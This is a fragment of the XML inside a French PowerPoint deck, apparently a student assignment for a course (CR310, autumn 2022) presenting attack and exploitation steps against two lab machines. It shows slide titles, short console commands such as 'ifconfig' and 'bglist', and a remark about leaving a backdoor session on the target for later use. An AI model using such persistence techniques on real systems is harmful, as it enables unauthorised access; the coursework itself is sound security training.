              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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4957754" cy="42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CA" sz="3200" dirty="0"/>
              <a:t>Étapes d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0"/>
              <a:t>’attaque de la première machine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7147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/>
              <a:t>3- Phase d’Exploitation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1472" y="1571612"/>
            <a:ext cx="7215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Pour finir, nous avons laisser une session (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>) sur la machine cible , comme ça nous pourrons l’utiliser au besoin. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1"/>
              <a:t>Bglist</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
              <a:t>&gt; Background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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7400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712</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran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Cours: CR310 Automne 2022 Devoir de Session</vt:lpstr>
      <vt:lpstr>Première machine </vt:lpstr>
      <vt:lpstr>Étapes d’attaque de la première machine </vt:lpstr>
      <vt:lpstr>Étapes d’attaque de la première machine </vt:lpstr>
      <vt:lpstr>Étapes d’attaque de la première machine </vt:lpstr>
      <vt:lpstr>Étapes d’attaque de la première machine </vt:lpstr>
      <vt:lpstr>Étapes d’attaque de la première machine </vt:lpstr>
      <vt:lpstr>Étapes d’attaque de la première machine </vt:lpstr>
      <vt:lpstr>Étapes d’attaque de la première machine </vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE</vt:lpstr>
      <vt:lpstr>DEUXIEME MACHINE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 CR310 Automne 2022 Devoir de Session</dc:title>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>285</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-23T23:09:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-05T04:11:12Z</dcterms:modified>
</cp:coreProperties>
</file>